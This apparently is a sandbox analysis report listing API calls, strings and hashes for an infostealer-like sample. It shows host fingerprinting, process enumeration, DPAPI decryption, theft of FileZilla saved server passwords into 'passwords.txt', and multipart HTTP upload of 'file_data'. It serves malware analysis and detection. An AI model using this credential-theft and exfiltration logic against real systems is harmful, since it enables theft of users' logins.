Opcode Fuzzy Hash: 21e2c9ec6af1c3d04352dc7bab1d51facdad81dd5dc808e52cbe79bae57ff78e
Instruction Fuzzy Hash: EB911F72900108A7CB24FB71DC569EE777DAB44744F40863EF902A29D6EF789A0C8695

Function 0040FC30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

GetKeyboardLayoutList.USER32(00000000,00000000,004201E9,00000000,?,00000030), ref: 0040FC4D
LocalAlloc.KERNEL32(00000040,00000000,?,00000030), ref: 0040FC5F
GetKeyboardLayoutList.USER32(00000000,00000000,?,00000030), ref: 0040FC69
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000030), ref: 0040FC93

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

LocalFree.KERNEL32(00000000,?,00000030), ref: 0040FD16

Strings

/ , xrefs: 0040FCAB

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: a6a69e9ec3cf8801765d105cb29036808ee146180d7c1341de0be4b221ecb394
Instruction ID: 0df51f6c7c38cdc7b73c36f3f29490646fb89a6b7ce8503a4d5a956f8c487b71
Opcode Fuzzy Hash: a6a69e9ec3cf8801765d105cb29036808ee146180d7c1341de0be4b221ecb394
Instruction Fuzzy Hash: 13218271500218BBDB20EBA1DC86EEE777DEF88700F40513AFA05661C1DF789949CBA4

Function 0040FBC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FBD1
HeapAlloc.KERNEL32(00000000), ref: 0040FBD8
GetTimeZoneInformation.KERNEL32(?), ref: 0040FBE7
wsprintfA.USER32 ref: 0040FC12

Strings

wwww, xrefs: 0040FBF8

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 362916592-671953474
Opcode ID: a671d90642e18a916263cb03e8fa96a413124f80aca2b8089fefbc7501649321
Instruction ID: fbce99371d8f23c69195bcece4cb59d5ef7dd42c2aed0f13d542024a30712026
Opcode Fuzzy Hash: a671d90642e18a916263cb03e8fa96a413124f80aca2b8089fefbc7501649321
Instruction Fuzzy Hash: 1EF02770B00218ABD71C3B78AC0EE6A3B6EAB81311F041365FF06CA2C0DB704C104AD1

Function 004112F0 Relevance: 7.6, APIs: 5, Instructions: 61processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411329
Process32First.KERNEL32(00000000,00000128), ref: 00411339
Process32Next.KERNEL32(00000000,00000128), ref: 0041134B
StrCmpCA.SHLWAPI(?,?), ref: 00411360
CloseHandle.KERNEL32(00000000), ref: 00411385

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: be8fff6f84b892f8d85d2b578ecce69cb58c0f85215eb4f569bb4dc899e8e412
Instruction ID: 3ee263357de7356a118a80b25b2dae21b26717c0aa6c402fa6d9d07f030b476f
Opcode Fuzzy Hash: be8fff6f84b892f8d85d2b578ecce69cb58c0f85215eb4f569bb4dc899e8e412
Instruction Fuzzy Hash: 70114C75A01618AFDB10DF98DC45BEEB7BCFB49761F0042AAE919E3680D7345A00CBA5

Function 00411400 Relevance: 7.6, APIs: 5, Instructions: 53processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411439
Process32First.KERNEL32(00000000,00000128), ref: 00411449
Process32Next.KERNEL32(00000000,00000128), ref: 0041145B
StrCmpCA.SHLWAPI(?,00423EE4), ref: 00411470
FindCloseChangeNotification.KERNEL32(00000000), ref: 00411482

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 2625226fddd4da006d26e06fdee4ba1bf4f4a11824d8d051c31eb45bd74834d2
Instruction ID: f304eba33368e90d87c3244fdfdafea8657fd46212b62d22af59a709f315db57
Opcode Fuzzy Hash: 2625226fddd4da006d26e06fdee4ba1bf4f4a11824d8d051c31eb45bd74834d2
Instruction Fuzzy Hash: 83110472944218AFC710CF94DC45BEBBBBCFB06B00F00916AFA0593240DB384A04CBE4

Function 00406D50 Relevance: 4.5, APIs: 3, Instructions: 47memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(0040EC94,00000000,00000000,00000000,00000000,00000000,?), ref: 00406D75
LocalAlloc.KERNEL32(00000040,?,00000000), ref: 00406D8D
LocalFree.KERNEL32(?), ref: 00406DAE

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 3e89ee642514d63ebe51338df4c39dbce53315f5121b1c3d1af6873a02a67f8e
Instruction ID: 5178535980331d1a95a47210b24ee6b6febbe527be0b83028620034588f0433e
Opcode Fuzzy Hash: 3e89ee642514d63ebe51338df4c39dbce53315f5121b1c3d1af6873a02a67f8e
Instruction Fuzzy Hash: FE012C79A00209ABDB10DFA8DC55FAA77B9EFC8700F144559FA05AB380DB75ED00CBA4

Function 0040FAE0 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 8218fe93c7511915d8ea69b2df3f7555064dccbdcf9b0fba1e292445f5964255
Instruction ID: 78103743301cbd06d6d8d66bd0cdb6708e3bc561754f37119468ce18e8306284
Opcode Fuzzy Hash: 8218fe93c7511915d8ea69b2df3f7555064dccbdcf9b0fba1e292445f5964255
Instruction Fuzzy Hash: 8FD012B1601218BBE7109BD4AC0DFDABBACDB05765F4001A1FA05D2241D5B0594087E5

Function 0040FDA0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 0040FDAD
wsprintfA.USER32 ref: 0040FDC3

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: cc8115d905fbb8cdd454b3d4cd268fd51ce0050b77075ef992d59a3f7f7a50e1
Instruction ID: 2d001d16c60f98aa9cd43fb7044d9c99f47e8ba4ce822719c414ae554ccf3ebb
Opcode Fuzzy Hash: cc8115d905fbb8cdd454b3d4cd268fd51ce0050b77075ef992d59a3f7f7a50e1
Instruction Fuzzy Hash: 9DD012B590021C97C710EB90FC859A9B77DEB44301F405695EF05A2141E779AA198BE5

Function 0040B9A0 Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 335
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC

strtok_s.MSVCRT ref: 0040BA5E
GetProcessHeap.KERNEL32(00000000,000F423F,004201E9,004201E9,004201E9,004201E9), ref: 0040BAA3
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BAAA
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BAC6
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BAD1

Part of subcall function 00411200: malloc.MSVCRT ref: 00411209
Part of subcall function 00411200: strncpy.MSVCRT ref: 00411219

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BB01
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB0C
StrStrA.SHLWAPI(00000000,<User>), ref: 0040BB42
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB4D
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BB7D
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB88
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC06
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC1E
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC36
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC4E
lstrcatA.KERNEL32(00000000,Soft: FileZilla), ref: 0040BC63
lstrcatA.KERNEL32(00000000,Host: ), ref: 0040BC6F
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BC7F
lstrcatA.KERNEL32(00000000,00423454), ref: 0040BC8B
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BC9B
lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCA7
lstrcatA.KERNEL32(00000000,Login: ), ref: 0040BCB3
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BCC3
lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCCF
lstrcatA.KERNEL32(00000000,Password: ), ref: 0040BCDB
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BCEB
lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCF7
lstrcatA.KERNEL32(00000000,00423408), ref: 0040BD03

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

strtok_s.MSVCRT ref: 0040BD47
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD5A

Strings

Soft: FileZilla, xrefs: 0040BC5D
<Pass encoding="base64">, xrefs: 0040BB77
Password: , xrefs: 0040BCD5
<User>, xrefs: 0040BB3C
<Host>, xrefs: 0040BAC0
passwords.txt, xrefs: 0040BD67
<Port>, xrefs: 0040BAFB
Login: , xrefs: 0040BCAD
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040B9F5
Host: , xrefs: 0040BC69

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 1826205597-935134978
Opcode ID: b117110a1ca78ac64bf51814e533fdc70b1223d867c6ece7ef5ad669f5215283
Instruction ID: 995b618bf102b3cf0671245d97106fbcf4553354a52c55c251f6feeeb9f0d63c
Opcode Fuzzy Hash: b117110a1ca78ac64bf51814e533fdc70b1223d867c6ece7ef5ad669f5215283
Instruction Fuzzy Hash: A4B150729001046ADB14FBA1EC56EEE777CEE50705F54903AF502B24D2EF3C6A0DCAA9

Function 004045D0 Relevance: 61.9, APIs: 26, Strings: 9, Instructions: 696
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00404641

Part of subcall function 00410DF0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410E14
Part of subcall function 00410DF0: GetProcessHeap.KERNEL32(00000000,?,?,00404635,?,?,?,?,?,?,?,?,00000030), ref: 00410E23
Part of subcall function 00410DF0: HeapAlloc.KERNEL32(00000000,?,?,00404635,?,?,?,?,?,?,?,?,00000030), ref: 00410E2A

StrCmpCA.SHLWAPI(?,00E59ED8,004201E9,004201E9,004201E9,004201E9), ref: 004046A6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004046CC
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004047B0
HttpOpenRequestA.WININET(00000000,00E59F78,?,00E5ADC8,00000000,00000000,?,00000000), ref: 004047ED
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404812

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00E501A0,00000000,?,00423358,00000000,?,?), ref: 00404C21
lstrlenA.KERNEL32(00000000), ref: 00404C33
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404C45
HeapAlloc.KERNEL32(00000000), ref: 00404C4C
lstrlenA.KERNEL32(00000000), ref: 00404C5E
memcpy.MSVCRT ref: 00404C72
lstrlenA.KERNEL32(00000000,?,?), ref: 00404C8B
memcpy.MSVCRT ref: 00404C95
lstrlenA.KERNEL32(00000000), ref: 00404CA6
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404CBF
memcpy.MSVCRT ref: 00404CCC
lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404CE2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404CF3
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404D1A
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404D5F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404DB3
StrCmpCA.SHLWAPI(00000000,block), ref: 00404DCB
ExitProcess.KERNEL32 ref: 00404DD6
InternetCloseHandle.WININET(00000000), ref: 00404DE7

Strings

", xrefs: 004048C4, 004049D3, 00404AE6, 00404BF6
--, xrefs: 00404710
------, xrefs: 00404721
ERROR, xrefs: 00404D27
build_id, xrefs: 004049B1
=tA, xrefs: 00404E59, 004048E6, 004048E9
file_data, xrefs: 00404BD4
------, xrefs: 00404818, 00404929, 00404A3A, 00404B4B
block, xrefs: 00404DBD

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
